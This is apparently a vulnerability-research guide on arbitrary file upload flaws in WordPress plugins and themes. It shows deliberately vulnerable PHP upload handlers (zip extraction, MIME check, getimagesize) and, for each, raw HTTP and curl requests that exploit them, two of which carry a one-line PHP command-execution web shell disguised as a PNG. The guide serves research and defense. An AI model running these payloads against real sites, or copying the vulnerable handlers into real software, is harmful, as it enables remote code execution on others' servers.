Arbitrary File Upload

Introduction

This article covers cases of possible Arbitrary File Upload on WordPress. This includes improper file input handling inside of the plugin/theme which can be used to arbitrarily upload files including .php files to further achieve Remote Code Execution (RCE).

Files Input

The most common way to trace if a plugin/theme has a file handling from user input is via the $_FILES PHP variable.

Another way that is most of the time missed by hackers is via WP_REST_Request::get_file_params function. This function retrieves multipart file parameters from the body of a custom REST API route registered by the plugin/theme.

Useful Functions

Several functions could be useful to identify a possible Arbitrary File Upload vulnerability:

• PHP related
  • move_uploaded_file
  • file_put_contents
  • fwrite
  • fputs
  • copy
  • fputcsv
  • rename
• WordPress related
  • WP_Filesystem_Direct::put_contents
  • WP_Filesystem_Direct::move
  • WP_Filesystem_Direct::copy

Compressed File Extraction

One of the processes to upload a file is through an extraction of the compressed file. The compressed itself can vary from zip, gz, tar, rar, xz, 7z, etc. Most of the time, the developer forgets to implement a pre-check before the extraction process and it could lead to users uploading arbitrary files if the user can control the filename and the content of the extracted file.

Here are several functions that can be used to decompress a file:

• ZipArchive::extractTo
• PharData::extractTo
• unzip_file

add_action("wp_ajax_unpack_fonts", "unpack_fonts");

function unpack_fonts(){
    $file = $_FILES["file"];
    $ext = end(explode('.',$file["name"]));

    if($ext !== "zip"){
        die();
    }

    $file_path = WP_CONTENT_DIR . "/uploads/" . $file["name"];
    move_uploaded_file($file["tmp_name"], $file_path);

    $zip = new ZipArchive;
    $f = $zip->open($file_path);

    if($f){
        $zip->extractTo(WP_CONTENT_DIR . "/uploads/");
        $zip->close();
    }
}

To bypass the above check we need to prepare a valid zip file and add a malicious PHP file inside the zip file. Below is the example of a raw HTTP and cURL request to trigger the Arbitrary File Upload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Connection: close
Cookie: <AUTHENTICATED_USER_COOKIE>
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Length: 352

------WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Disposition: form-data; name="action"

unpack_fonts
------WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Disposition: form-data; name="file"; filename="pwn.zip"
Content-Type: application/zip

<MALICIOUS_ZIP_METADATA>
------WebKitFormBoundary4Qx3GCzIwMf0iOPi--

OR

curl -F 'file=@pwn.zip' 'http://localhost/wp-admin/admin-ajax.php?action=unpack_fonts' -H 'Cookie: <AUTHENTICATED_USER_COOKIE>'

Bypass Techniques

Some of the conditions may make the file upload process secure, however, these specific conditions can still be bypassed to achieve an Arbitrary File Upload

MIME Type Check

Developers often only check for the file’s MIME content type before performing the upload process. This check alone is not enough to prevent Arbitrary File Upload since the attacker just needs to insert or append a malicious string like PHP code into a valid acceptable file MIME type.

Several functions could be used to check for a file’s MIME type. Here are several functions that can be used to check for MIME type:

• mime_content_type
• exif_imagetype
• finfo_file

Example of vulnerable code:

add_action("wp_ajax_nopriv_upload_image_check_mime", "upload_image_check_mime");

function upload_image_check_mime(){
    $file = $_FILES["file"];
    $file_type = mime_content_type($file["tmp_name"]);
    $file_path = WP_CONTENT_DIR . "/uploads/" . $file["name"];
    $allowed_mime_type = array("image/png", "image/jpeg");

    if(in_array($file_type, $allowed_mime_type)){
        move_uploaded_file($file["tmp_name"], $file_path);
        echo "file uploaded";
    }
    else{
        echo "file mime type not accepted";
    }
}

To bypass the above check we need to prepare a valid PNG file and append a malicious PHP code to the PNG file metadata then rename the file with php extension. Below is the example of a raw HTTP and cURL request to trigger the Arbitrary File Upload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Length: 352

------WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Disposition: form-data; name="action"

upload_image_check_mime
------WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: image/png

<PNG_IMAGE_METADATA>
<?php echo system($_GET["id"]); ?>
------WebKitFormBoundary4Qx3GCzIwMf0iOPi--

OR

curl -F 'file=@pwn.php' 'http://localhost/wp-admin/admin-ajax.php?action=upload_image_check_mime'

Image Related Check

Most of the file upload process is for an image type of file. Sometimes, developers only check for conditions that are related to an image file. One of the common functions to be used for image-related checks is getimagesize function.

Example of vulnerable code:

add_action("wp_ajax_nopriv_upload_image_getimagesize", "upload_image_getimagesize");

function upload_image_getimagesize(){
    $file = $_FILES["file"];
    $file_path = WP_CONTENT_DIR . "/uploads/" . $file["name"];
    $size = getimagesize($file["tmp_name"]);
    $fileContent = file_get_contents($_FILES['file']["tmp_name"]);

    if($size){
        file_put_contents($file_path, $fileContent);
        echo "image uploaded";
    }
    else{
        echo "invalid image size";
    }
}

To bypass the above check we need to prepare a valid image file and append a malicious PHP code to the image file metadata then rename the file with php extension. Below is the example of a raw HTTP and cURL request to trigger the Arbitrary File Upload:

POST /wp-admin/admin-ajax.php HTTP/1.1
Host: localhost
Connection: close
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Length: 352

------WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Disposition: form-data; name="action"

upload_image_getimagesize
------WebKitFormBoundary4Qx3GCzIwMf0iOPi
Content-Disposition: form-data; name="file"; filename="pwn.php"
Content-Type: image/png

<PNG_IMAGE_METADATA>
<?php echo system($_GET["id"]); ?>
------WebKitFormBoundary4Qx3GCzIwMf0iOPi--

OR

curl -F 'file=@pwn.php' 'http://localhost/wp-admin/admin-ajax.php?action=upload_image_getimagesize'

Article References

Below are some of the findings related to Arbitrary File Upload:

• AI Engine Plugin Affected by Critical Vulnerability
• Multiple Vulnerabilities Patched in Themify Ultra Theme
• Critical Vulnerability in Elementor Affecting 5+ Million Websites
• Pre-Auth Arbitrary File Upload in User Submitted Posts Plugin
• Critical Arbitrary File Upload Patched in Forminator Plugin
• Multiple High and Critical Vulnerabilities in Avada Theme and Plugin
• Critical Vulnerabilities Patched in Jupiter X Core Plugin